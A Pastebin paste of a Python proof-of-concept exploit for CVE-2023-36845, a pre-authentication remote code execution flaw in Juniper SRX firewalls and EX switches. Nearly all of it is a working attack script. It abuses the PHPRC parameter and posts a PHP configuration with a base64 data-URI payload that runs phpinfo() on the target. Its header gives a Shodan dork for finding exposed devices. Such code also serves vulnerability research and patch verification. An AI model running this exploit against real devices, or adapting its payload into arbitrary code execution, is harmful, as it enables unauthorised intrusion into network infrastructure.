FlyFar

Juniper-SRX-Firewalls&EX-switches - (PreAuth-RCE) (PoC)

Feb 2nd, 2024
172
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.23 KB | Cybersecurity | 0 0
  1. # ***************************************************************************************************
  2. # Exploit Title: juniper-SRX-Firewalls&EX-switches (PreAuth-RCE) (PoC)
  3. # Description:
  4. #
  5. # This code serves as both a vulnerability detector and a proof of concept for CVE-2023-36845.
  6. # It executes the phpinfo() function on the login page of the target device,
  7. # allowing to inspect the PHP configuration. also this script has the option to save the phpinfo()
  8. # output to a file for further analysis.
  9. #
  10. # Shodan Dork: http.favicon.hash:2141724739
  11. # Date: 2023/10/01
  12. # Exploit Author: whiteOwl (whiteowl.pub@gmail.com)
  13. # Vendor Homepage: https://whiteowl-pub.github.io
  14. # Version: Versions Prior to 20.4R3-S9,21.1R1,21.2R3-S7,21.3R3-S5,
  15. #          21.4R3-S5,22.1R3-S4,22.2R3-S2,22.3R2-S2/R3-S1,22.
  16. #          4R2-S1/R3,23.2R1-S1/R2
  17. # Tested on: JUNOS SM804122pri 15.1X49-D170.4
  18. # CVE : cve-2023-36845
  19. # ***************************************************************************************************
  20.  
  21. import argparse
  22. import requests
  23.  
  24. banner = """
  25. *************************************************************
  26. * CVE-2023-36845 Vulnerability Detector & Proof of concept  *
  27. * This script checks for the CVE-2023-36845 vulnerability   *
  28. * and run phpinfo() on vulnerable devices.                  *
  29. * If you suspect a vulnerable system, please take action    *
  30. * immediately to secure it.                                 *
  31. *                                                           *
  32. * Author: whiteowl                                          *
  33. *************************************************************
  34. """
  35.  
  36. def send_request(url, output_file=None, verbose=False):
  37.     target_url = f"{url}/?PHPRC=/dev/fd/0"
  38.     data = 'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'
  39.  
  40.     headers = {
  41.         'User-Agent': 'Mozilla/5.0',
  42.     }
  43.  
  44.     try:
  45.         response = requests.post(target_url, headers=headers, data=data, stream=True)
  46.         if response.status_code == 200:
  47.             print("The Target Device is Vulnerable to: CVE-2023-36845")
  48.         else:
  49.             print("Not Vulnerable: Status Code", response.status_code)
  50.            
  51.         if output_file:
  52.             with open(output_file, 'w', encoding='utf-8') as file:
  53.                 file.write(response.text)
  54.  
  55.         if verbose:
  56.             print(f"HTTP Status Code: {response.status_code}")
  57.             print("Response Headers:")
  58.             for header, value in response.headers.items():
  59.                 print(f"{header}: {value}")
  60.             print("Response Content:")
  61.             print(response.text)
  62.     except requests.exceptions.RequestException as e:
  63.         print(f"An error occurred: {e}")
  64.  
  65. def main():
  66.     print(banner)
  67.     parser = argparse.ArgumentParser(description="Custom curl-like script")
  68.     parser.add_argument("-u", "--url", required=True, help="URL to send the HTTP request")
  69.     parser.add_argument("-o", "--output", help="Output file to save the HTML content")
  70.     parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose mode")
  71.  
  72.     args = parser.parse_args()
  73.     send_request(args.url, args.output, args.verbose)
  74.  
  75. if __name__ == "__main__":
  76.     main()
  77.            
Add Comment
Please, Sign In to add comment